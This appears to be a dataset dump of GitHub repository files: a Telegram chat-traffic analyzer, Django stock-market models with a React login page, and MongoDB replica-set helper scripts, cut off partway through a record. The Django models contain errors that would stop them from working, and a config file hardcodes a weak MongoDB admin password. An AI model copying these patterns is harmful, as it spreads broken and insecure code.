repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
AndydeCleyre/tgnize
https://github.com/AndydeCleyre/tgnize
8bba5be72edd5d3b00234227f444ec3bb8f49df7
45dd2604841226499f9c5af185c4cc3835f9c0da
a699018ea2146f5357b0ce791e840d64fb7baca0
refs/heads/master
2020-09-16T05:28:43.665690
2019-11-23T18:03:42
2019-11-23T18:03:42
223,667,214
0
0
null
2019-11-23T23:31:29
2019-11-23T18:03:59
2019-11-23T18:03:57
null
[ { "alpha_fraction": 0.6048902869224548, "alphanum_fraction": 0.6172303557395935, "avg_line_length": 32.922481536865234, "blob_id": "9b230edcf65adf359127006f54f63c04e285f27a", "content_id": "21a6437eddc5309076ca611d3e31ad8b469a5c64", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4376, "license_type": "permissive", "max_line_length": 275, "num_lines": 129, "path": "/app.py", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nfrom __future__ import annotations\nfrom typing import List, Tuple\nfrom functools import reduce\nfrom util import parseChat\nfrom plotting_scripts.minuteBasedAccumulatedTraffic import extractMinuteBasedTraffic, extractMinuteBasedTrafficByUser, plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan\nfrom sys import argv\nfrom os import mkdir\nfrom os.path import abspath, exists, join\n\n'''\n Given sink directory path and target file name,\n it joins them into a single component & returns\n sink file path ( absolute )\n'''\n\ndef _getSinkFilePath(dirName: str, fileName: str) -> str:\n return join(abspath(dirName), fileName)\n\n'''\n Checks presence of sink directory on current machine,\n if doesn't exists, it builds so.\n'''\n\ndef _sinkDirBuilder(targetPath: str):\n _tmp = abspath(targetPath)\n if not exists(_tmp):\n mkdir(_tmp)\n\n'''\n Displays a simple banner, depicting usage of script,\n along with author name & repository address\n'''\n\ndef _displayBanner():\n print('\\x1b[1;6;36;49m[+]tgnize v0.1.1 - How about another Telegram Chat Analyzer ?\\x1b[0m\\n\\n\\t\\x1b[3;30;47m$ tgnize `path-to-exported-chat-dir` `path-to-sink-dir`\\x1b[0m\\n\\n[+]Author: Anjan Roy<[email protected]>\\n[+]Source: https://github.com/itzmeanjan/tgnize ( MIT Licensed )\\n')\n\n'''\n Retuns source directory path ( holding exported telegram chat data set ) &\n sink directory ( where we'll store generated plots )\n'''\n\ndef _handleCMDInput() -> Tuple[str, str]:\n return tuple(argv[1:len(argv)]) if len(argv) == 3 else (None, None)\n\n'''\n Escapes troublesome special characters present in chat participant's\n names, which might cause some issue, if we put it in generated plots ( animated )\n name\n'''\n\ndef _getEscapedName(proposedName: str) -> str:\n return proposedName.translate(\n proposedName.maketrans(\n {'/': r'_',\n '\\\\': r'_',\n ' ': r'_'\n }\n )\n )\n\n'''\n Calculates rate of success of execution of this script on\n exported chat data\n'''\n\ndef __calculateSuccess__(data: List[bool]) -> float:\n return reduce(lambda acc, cur: (acc + 1) if cur else acc, data, 0) / len(data) * 100\n\n\n'''\n Main entry point of script\n'''\n\n\ndef main() -> float:\n _result = []\n try:\n source, sink = _handleCMDInput()\n if not source or not sink or not exists(source):\n _displayBanner()\n raise Exception('Improper Invocation of `tgnize`')\n _sinkDirBuilder(sink)\n print('\\x1b[1;6;36;49m[+]tgnize v0.1.1 - How about another Telegram Chat Analyzer ?\\x1b[0m\\n[*]Working ...')\n # a reusable reference, which will be used, over lifetime of this script,\n chat = parseChat(source)\n # holding full chat, currently under consideration\n _result.append(\n plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan(\n extractMinuteBasedTraffic(chat),\n 'Accumulated Chat Traffic by Minute',\n _getSinkFilePath(sink, 'accumulatedChatTrafficByMinute.gif')\n )\n )\n for i in chat.getTopXParticipants(5):\n _result.append(\n plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan(\n extractMinuteBasedTrafficByUser(chat, i),\n 'Accumulated Chat Traffic by Minute for {}'.format(i),\n _getSinkFilePath(sink, 'accumulatedChatTrafficByMinuteFor{}.gif'.format(\n _getEscapedName(i)))\n )\n )\n '''\n for i in chat.users:\n _result.append(\n plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan(\n extractMinuteBasedTrafficByUser(chat, i.name),\n 'Accumulated Chat Traffic by Minute for {}'.format(\n i.name[:8] + '...' if len(i.name) > 10 else i.name),\n './plots/accumulatedChatTrafficByMinuteFor{}.gif'.format(\n _getEscapedName(i.name))\n )\n )\n '''\n except Exception as e:\n print('[!]Error : {}'.format(e))\n finally:\n return __calculateSuccess__(_result)\n\n\nif __name__ == '__main__':\n try:\n print('[+]Success : {:.2f} %'.format(main()))\n except KeyboardInterrupt:\n print('\\n[!]Terminated')\n finally:\n exit(0)\n" }, { "alpha_fraction": 0.5178571343421936, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 17.66666603088379, "blob_id": "30dc720c18b77913202c0a6c8f8c6754b86a1f4c", "content_id": "f27b58f7be52329a6cac3f75bec5d30dd48d28c7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 56, "license_type": "permissive", "max_line_length": 21, "num_lines": 3, "path": "/requirements.txt", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "matplotlib==3.0.2\ntyping==3.7.4.1\nbeautifulsoup4==4.8.1\n" }, { "alpha_fraction": 0.6167401075363159, "alphanum_fraction": 0.7092511057853699, "avg_line_length": 74.66666412353516, "blob_id": "6abd001c83ead9019b3c4dad8687ef45a8ba8210", "content_id": "eb2e94101bb88260c4a3032d9cac9e561c321c13", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 227, "license_type": "permissive", "max_line_length": 177, "num_lines": 3, "path": "/install", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\npip3 install -r requirements.txt\necho -en \"\\n\\n\\x1b[6;30;47m[+]Append \\x1b[6;30;41m$PWD\\x1b[6;30;47m , to your system PATH\\n[+]Now on you can invoke $ tgnize path-to-exported-chat-dir path-to-sink-dir\\n\\x1b[0m\"\n" }, { "alpha_fraction": 0.6732824444770813, "alphanum_fraction": 0.6809160113334656, "avg_line_length": 27.478260040283203, "blob_id": "ca37ffc81111ad0ca78f80801a233ff70525b13c", "content_id": "438376cb18b0bca106087fc3d86f78cbe4e65473", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 655, "license_type": "permissive", "max_line_length": 85, "num_lines": 23, "path": "/plotting_scripts/messageCount.py", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nfrom __future__ import annotations\nfrom model.chat import Chat\nfrom typing import Dict\n\n'''\n Returns a mapping of all those Users\n who're top contributors in this Chat,\n along with their percentage of contribution\n in terms of number of messages sent\n'''\n\ndef getTopXParticipantsAlongWithContribution(x: int, chat: Chat) -> Dict[str, float]:\n _tmp = chat.totalMessageCount\n return dict(map(lambda e: (e, chat.getUser(e).totalMessageCount / _tmp * 100),\n chat.getTopXParticipants(x)))\n\n\n\nif __name__ == '__main__':\n print('[!]This module is designed to be used as a backend handler')\n exit(0)\n" }, { "alpha_fraction": 0.5957446694374084, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 22.5, "blob_id": "2a284f8ec8e6f5a95a78ebf70444924262cf60e0", "content_id": "14a887c07c6027fea96742b27a0b605bdd98fcac", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 47, "license_type": "permissive", "max_line_length": 30, "num_lines": 2, "path": "/tgnize", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\npython3 `dirname $0`/app.py $@\n" }, { "alpha_fraction": 0.7161172032356262, "alphanum_fraction": 0.7277722358703613, "avg_line_length": 45.55813980102539, "blob_id": "7c0dddff5206b5f87cc10987bf42966266c2b4ef", "content_id": "47bcdb1b2b1caf83fe455ddc6cc0482187b2f43d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6176, "license_type": "permissive", "max_line_length": 314, "num_lines": 129, "path": "/README.md", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "# tgnize\n\n![accumulatedChatTrafficByMinuteOfDevsChatGroupTelegram](./plots/accumulatedChatTrafficByMinute.gif)\n\nHow about another exported Telegram Chat analyzer ? :wink:\n\n## nomenclature\nTelegram + _( Chat )_ Analyze = tgnize\n\n## motivation\n- I'm always interested in learning more about data, which is why I thought about taking a deeper look into Telegram Chats _( mostly groups )_, I participate in.\n- I exported chat data _( excluding audios, videos and images etc. )_, of [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw) group, using Telegram Desktop Client, which are nothing but some HTML, CSS & JS files\n- I created an object model, into which I populated parsed Chat data, so that I can manipulate it well\n- Then I started plotting animated charts & much more _( a lot of work remaining though )_, to depict how participants contributed to chat\n- It also lets me understand my chat activity pattern(s) i.e. in which hour of the day I'm mostly active / inactive in Chat\n- Or how another peer is spending their time is Chat\n- What's mostly used words / mostly used bots / mostly used Emoji etc. in Chat\n\n## caution\nThis project doesn't expect you to use any exported Chat for manipulating any participant or use extracted data _( sleep patterns, daily activity pattern of participants )_ for doing some harmful activity to any participant.\n\n**If users use it for malicious purpose(s), it's not author's responsibility !!!**\n\nI suggest you not to use it for manipulating someone else. Thank you for understanding :wink:\n\n## data source\nHere I'm using [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw)'s, exported Chat data set for testing these scripts. So all plots ( to be :wink: ) generated, present in this repository, are result of application of scripts on [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw)'s exported Chat data.\n\n~Template data set is present [here](.). It holds all messages of [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw) upto _03/11/2019_ from initialization of group.~\n\n**For respecting privacy of all users, I'm removing that data source from this public repo. Export chat data for your own need.**\n\n### exporting chat\nFor exporting chat data for [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw) group of Telegram, I used Official Telegram Desktop Client. Exporting was done, while only including text messages _( no images, videos or audios )_, which are nothing but a bunch of HTML files.\n\nIf you want to run these scripts on your machine, make sure you've Telegram Desktop Client installed.\n\n```shell script\n$ sudo snap install telegram-desktop # run on your linux terminal\n```\nLog into your account and choose which chat to export. Well this expoting procedure can take some time, depending upon age & activeness of Chat.\n\n## usage\n- Download this zip from [here](https://github.com/itzmeanjan/tgnize/releases)\n- Unzip it into a suitable directory on your machine\n- Get into `tgnize` directory\n\n```shell script\n$ cd tgnize\n$ tree -h\n.\n├── [4.2K] app.py\n├── [4.0K] docs\n│   └── [1.8K] minuteBasedAccumulatedTraffic.md\n├── [ 227] install\n├── [1.0K] LICENSE\n├── [4.0K] model\n│   ├── [ 245] activity.py\n│   ├── [9.8K] chat.py\n│   ├── [ 332] event.py\n│   ├── [ 100] __init__.py\n│   ├── [1.3K] message.py\n│   ├── [ 515] plotDataRange.py\n│   └── [1.1K] user.py\n├── [4.0K] plotting_scripts\n│   ├── [ 100] __init__.py\n│   ├── [ 169] messageCount.py\n│   └── [ 11K] minuteBasedAccumulatedTraffic.py\n├── [2.7K] README.md\n├── [ 56] requirements.txt\n├── [ 47] tgnize\n└── [4.4K] util.py\n\n3 directories, 18 files\n```\n- Make sure you've `python3-pip` installed, which will be required for installing python modules ( i.e. beautifulsoup4, matplotlib etc. )\n- Run `install` script ( BASH script ), which will download all required dependencies into your machine\n\n```shell script\n$ ./install\n```\n- For generating animated plots, you'll need to have `imagemagick` installed on your machine. Install it using your system package manager.\n\n```shell script\n$ sudo apt-get install imagemagick # for debian based distros\n$ sudo dnf install imagemagick # for fedora\n```\n- Now you need to add installation path of `tgnize`, into your **PATH** variable\n\n```shell script\n$ pwd # copy it\n```\n- If you're on BASH, find `.bashrc` under your home directory, if not found create a file with that name\n- Add follwing line at end of that file, while replacing `paste-here` section with installation path of `tgnize`\n\n```shell script\nexport PATH=\"$PATH:paste-here\"\n```\n- Now close this terminal window & open a new one\n- You'll have `tgnize`, executable BASH script present under downloaded zip, on your path. Simply invoke `tgnize` directly, to be sure things are working as they're supposed to be\n\n```shell script\n$ cd # get to home directory\n$ tgnize\n[+]tgnize v0.1.0 - How about another Telegram Chat Analyzer ?\n\n\t$ tgnize `path-to-exported-chat-dir` `path-to-sink-dir`\n\n[+]Author: Anjan Roy<[email protected]>\n[+]Source: https://github.com/itzmeanjan/tgnize ( MIT Licensed )\n\n[!]Error : Improper Invocation of `tgnize`\n```\n- It's asking you to properly invoke script, by giving source directory _( holding exported telegram chat, of a single Chat, may be a lot of files in case of large Chats )_ & sink directory _( will hold generated plots / charts )_\n- If you've already exported some Telegram chat, consider invoking this script, to understand how you spent your time in Chat\n\n## progress\n\n**This project is in its infancy, a lot of features to be added. If you've something in your mind, don't hesitate to create an issue or make a PR**\n\n- [x] [Depiction of Accumulated Chat Traffic _( for whole Chat along with top **X** chat participants )_](./docs/minuteBasedAccumulatedTraffic.md)\n- [ ] Contribution of Chat Participants to Chat\n- [ ] Overall Activity of Chat _( for a specified period of time )_\n- [ ] Emoji Analysis\n- [ ] Text Analysis\n\n_Got some new idea ? Make a PR_ :wink:\n\n**Work in Progress** - _coming with more details soon_\n" } ]
6
Hilina-Ayalew/EthioStock
https://github.com/Hilina-Ayalew/EthioStock
2654b717f110de1d4032c584fc11437fae2b4b48
3a7837239f4efafc0a72d82e0b9cfc953f8edb8e
cdb9fc0588ae787c5df6a6f69fd53183e6662591
refs/heads/master
2023-03-13T02:21:29.197040
2020-02-25T08:40:19
2020-02-25T08:40:19
344,048,539
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6753246784210205, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 27.9375, "blob_id": "1ff80808dde0aefd564cbe470f35427a4cb08701", "content_id": "3488745b60b06adacb5e1f53ed24563a20a29b87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 462, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/backend/EthioStock/userreport/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom investor.models import InvestorModel\n\nclass UserReportModel(models.Model):\n reportedBy = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n reportedUserId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n reason = models.TextField()\n reportCount = models.IntegerField()" }, { "alpha_fraction": 0.6898733973503113, "alphanum_fraction": 0.702531635761261, "avg_line_length": 38.5625, "blob_id": "7e967d873994d4e5e46424130ae5794837c8838b", "content_id": "cb65514616d7ec94a853c7059fcfefbef7e652e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 632, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/backend/EthioStock/investor/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass InvestorModel(models.Model):\n GENDER = (('F','Female'), ('M','Male'))\n investorId = models.AutoField(primary_key = True)\n username = models.CharField(unique=True)\n firstName = models.CharField(max_length=30)\n lastName = models.CharField(max_length=30)\n phoneNo = models.CharField()\n sex = models.CharField(choices = GENDER)\n email = models.CharField()\n subcity = models.CharField()\n woreda = models.CharField()\n password = models.CharField(max_length=20)\n nationality = models.CharField(max_length=20)\n registerDate = models.DateTimeField(auto_now_add=True)" }, { "alpha_fraction": 0.6988763809204102, "alphanum_fraction": 0.6988763809204102, "avg_line_length": 28.66666603088379, "blob_id": "e1825d769b478947486e83edb5aea4cc6b8d1db6", "content_id": "b328f3d29d26f0b9bc1d76ac8cba89ab897ebed5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 445, "license_type": "no_license", "max_line_length": 51, "num_lines": 15, "path": "/backend/EthioStock/watchlist/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\nfrom investor.models import InvestorModel\n\nclass WatchlistModel(models.Model):\n ownerId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n businessId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\", \n on_delete = models.DO_NOTHING\n )\n" }, { "alpha_fraction": 0.7065368294715881, "alphanum_fraction": 0.7079277038574219, "avg_line_length": 30.30434799194336, "blob_id": "0e034d2832b1c4c427dffad843a780b09f6b2376", "content_id": "c94656b821229514a454ec70ebc6105d7f9e6232", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 54, "num_lines": 23, "path": "/backend/EthioStock/soldstock/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom stock.models import StockModel\nfrom investor.models import InvestorModel\nfrom businessowner.models import BusinessOwnerModel\n\nclass SoldStockLedgerModel(models.Model):\n stockId = models.ForeignKey(\n StockModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )\n investorId = models.ForeignKey(\n InvestorModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )\n totalPrice = models.DecimalField(decimal_places=2)\n numberOfStock = models.IntegerField()\n sellerId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )" }, { "alpha_fraction": 0.7119815945625305, "alphanum_fraction": 0.7119815945625305, "avg_line_length": 28, "blob_id": "fca27742e15a84c703ae76dbddc44f7f3140d056", "content_id": "de1ace9bd47b2b12f578c8a33fa420427cdccd5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 51, "num_lines": 15, "path": "/backend/EthioStock/follower/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\nfrom investor.models import InvestorModel\n\nclass FollowerModel(models.Model):\n businessId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.CASCADE\n )\n investorId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\",\n on_delete=models.CASCADE\n )" }, { "alpha_fraction": 0.7106017470359802, "alphanum_fraction": 0.7106017470359802, "avg_line_length": 28.16666603088379, "blob_id": "ad017f063f29eec289488e5ba52a6866b95ec8d4", "content_id": "74fb0ea7f040c7badcd91b1de7ccd93b3e7b561a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 42, "num_lines": 12, "path": "/backend/EthioStock/prediction/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom stock.models import StockModel\n\nclass PredictionModel(models.Model):\n stockID = models.ForeignKey(\n StockModel,\n related_name=\"stockId\",\n on_delete=models.CASCADE\n )\n predictedPrice = models.DecimalField()\n actualPrice = models.DecimalField()\n predictionDate = models.DateField()" }, { "alpha_fraction": 0.6851851940155029, "alphanum_fraction": 0.6851851940155029, "avg_line_length": 26.08333396911621, "blob_id": "39bcfc44233a90663280cf16873d8af778a63918", "content_id": "8a0ea79c103d5b985d752d0089481db34d04796d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 41, "num_lines": 12, "path": "/backend/EthioStock/reaction/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom investor.models import InvestorModel\n\nclass Reaction(models.Model):\n postId = id\n investorId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n isLike = models.BooleanField()\n comment = models.TextField()" }, { "alpha_fraction": 0.6904109716415405, "alphanum_fraction": 0.6904109716415405, "avg_line_length": 29.5, "blob_id": "80c8eb3b1e5b8c2577210c34edf9368213b814be", "content_id": "d7507d2676d4d7b24cff08f29991122eb7b077fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 365, "license_type": "no_license", "max_line_length": 39, "num_lines": 12, "path": "/backend/EthioStock/businessowner/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass BusinessOwnerModel(models.Model):\n businessOwnerId = id\n name = models.CharField()\n ownerPhone = models.CharField()\n password = models.CharField()\n website = models.CharField()\n category = models.CharField()\n email = models.CharField()\n subCity = models.CharField()\n legality = models.CharField()" }, { "alpha_fraction": 0.7039999961853027, "alphanum_fraction": 0.7039999961853027, "avg_line_length": 27.923076629638672, "blob_id": "18cd8189beacc29827d61200ae3d6dd5da1d0846", "content_id": "dbab422e753eff5d408d9faafde6e5f2ce5fa4c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 51, "num_lines": 13, "path": "/backend/EthioStock/post/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\n\nclass PostModel(models.Model):\n postId = id\n ownerId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )\n description =models.TextField()\n image = [models.ImageField()]\n date = models.DateTimeField()" }, { "alpha_fraction": 0.7018739581108093, "alphanum_fraction": 0.7018739581108093, "avg_line_length": 29.947368621826172, "blob_id": "721544a0c63c5fc50814123145714caa9745c9a9", "content_id": "0f50b2c2e6be8626fab1de3acb1146415ae759de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 51, "num_lines": 19, "path": "/backend/EthioStock/stock/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\n\nclass StockModel(models.Model):\n stockId = id\n ownerID = models.CharField()\n price = models.CharField()\n closingDate = models.DateField()\n openingDate = models.DateField()\n description = models.TextField()\n noOfStock = models.IntegerField()\n approved = models.BooleanField()\n sells = models.DecimalField()\n buys = models.DecimalField()\n ownerID = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.CASCADE\n )" }, { "alpha_fraction": 0.5395495295524597, "alphanum_fraction": 0.5405972003936768, "avg_line_length": 27.939393997192383, "blob_id": "968c0bee77fbdff6fa4abc751bb8f29a8972a648", "content_id": "22d03ae77a04205a43eee5d139dc992894d8743b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1909, "license_type": "no_license", "max_line_length": 132, "num_lines": 66, "path": "/frontend/src/components/Login.js", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport LoginSignupHeader from './LoginSignupHeader';\nimport '../styles/styles.scss';\nimport { Icon } from 'antd';\nimport SignupPage from './Signup'\nimport ReactDOM from 'react-dom';\n\nclass LoginPage extends React.Component{\n authenticate(){\n\n }\n \n redirectToSignup(){\n ReactDOM.render(<SignupPage />, document.getElementById('root'));\n }\n \n render(){\n return(\n <div className = \"login-container \">\n \n <LoginSignupHeader/>\n <div className = \"login-flex-container\">\n\n <div className = \"login-signup-left-side\">\n <p><span className = \"icon\"><Icon type = \"stock\"/></span>Data analysis and price prediction</p>\n <p><span className = \"icon\"><Icon type=\"file-done\" /></span>Have watchlists</p>\n <p><span className = \"icon\"><Icon type=\"dollar\" /></span>Apply for stocks and manage your application</p>\n <p><span className = \"icon\"><Icon type=\"reconciliation\" /></span>Submit applications through dynamic forms</p> \n </div>\n\n <div className = \"login-signup-right-side login-form\">\n <h1>Login</h1>\n <form onSubmit={this.authenticate}>\n <div>\n <Icon type = \"user\" className =\"input-icon\"/>\n <input type=\"text\" placeholder=\"username or email\" name=\"username\"/><br/><br/>\n \n </div>\n <div>\n <Icon type = \"key\" className =\"input-icon\"/>\n <input type=\"password\" placeholder = \"password\" name=\"password\"/><br/>\n \n </div>\n\n <button \n className = \"signup-link\"\n onClick = {this.redirectToSignup}\n >Signup?</button>\n <input type=\"submit\"/>\n </form>\n </div>\n\n\n\n </div>\n \n\n\n\n\n </div>\n );\n }\n}\n\nexport default LoginPage;" } ]
11
kita-atsushi/playbook_mongodb
https://github.com/kita-atsushi/playbook_mongodb
ad63aa4fdca2bf14380205c8547eca971d1650fd
dbc8557d7bdd2bc2e9d5803edef478744cf4a45b
c5426620fb9e54f56d8c12a76a8d7db7418a290d
refs/heads/master
2021-05-11T10:58:27.098619
2018-06-12T14:08:36
2018-06-12T14:08:36
118,118,279
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7397260069847107, "alphanum_fraction": 0.8219178318977356, "avg_line_length": 35, "blob_id": "d22556fec90d8a6c4f00403695080b6513555664", "content_id": "3197fcce053c457d38c022c96df64eefc4634479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 73, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/relaunch.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "vagrant destroy -f mongo1 mongo2 mongo3\nvagrant up mongo1 mongo2 mongo3\n\n" }, { "alpha_fraction": 0.6230366230010986, "alphanum_fraction": 0.7696335315704346, "avg_line_length": 26.285715103149414, "blob_id": "e17733362371ee51c544bbc03611573d8292fc6e", "content_id": "f601fbecbfd0271cd94c0a4a2b0d41019d237ea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 191, "license_type": "no_license", "max_line_length": 87, "num_lines": 7, "path": "/tools/client_example/client.ini", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "[con]\nmongo_url = mongodb://admin:123456@mongo1:27017,mongo2:27017/admin?replicaSet=mongo_rep\n\n[insert]\nbulk_max_count = 300000\nw_concern_opt = majority\nw_concern_repl_timeout_milisec = 3000\n" }, { "alpha_fraction": 0.7542579174041748, "alphanum_fraction": 0.7591241002082825, "avg_line_length": 23.176469802856445, "blob_id": "6fea2d20698c047c210d798fec5aee8a5a050042", "content_id": "1de4c2ca4c96f3476cb2201fceb9df010c160f64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 55, "num_lines": 17, "path": "/tools/client_example/count_all_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nclient = MongoClient(mongo_url)\n\ndb = client.repltestdb\ncount = db.testcol01.find({}).count()\nprint count\n" }, { "alpha_fraction": 0.7690288424491882, "alphanum_fraction": 0.7769029140472412, "avg_line_length": 28.30769157409668, "blob_id": "5d7e28a429b2315ff4d20544af1aae271a7f6ea2", "content_id": "e6dbf10bb0ee839ddb0ccab5b192d85d1a03d8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 381, "license_type": "no_license", "max_line_length": 177, "num_lines": 13, "path": "/install_tools/install_pip.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"@@@ Install python-pip\"\nyum groupinstall -y \"Base\"\nyum groupinstall -y \"Development tools\"\nyum install -y zlib zlib-devel openssl tk-devel tcl-devel sqlite-devel ncurses-devel gdbm-devel readline-devel bzip2-devel db4-devel openssl-devel python-setuptools python-devel\nyum install -y libffi-devel\n\neasy_install pip\npip install --upgrade pip\n\necho \"Done!\"\n\nexit 0\n" }, { "alpha_fraction": 0.7115384340286255, "alphanum_fraction": 0.7307692170143127, "avg_line_length": 16.33333396911621, "blob_id": "ae32e2eed887339caec872d2de867373dfe12821", "content_id": "146a45924c6b2edad33b3c1a3def34b8986ea0fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 156, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/install_tools/install_ansible.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"@@@ Install ansible\"\npip install PyYAML paramiko Jinja2 httplib2 six\npip install ansible\nyum install -y sshpass\n\necho \"@@@ Done!\"\n\nexit 0\n" }, { "alpha_fraction": 0.37272727489471436, "alphanum_fraction": 0.3909091055393219, "avg_line_length": 16.3157901763916, "blob_id": "dc56f59460febe673d2c1b170e84735daa0a766f", "content_id": 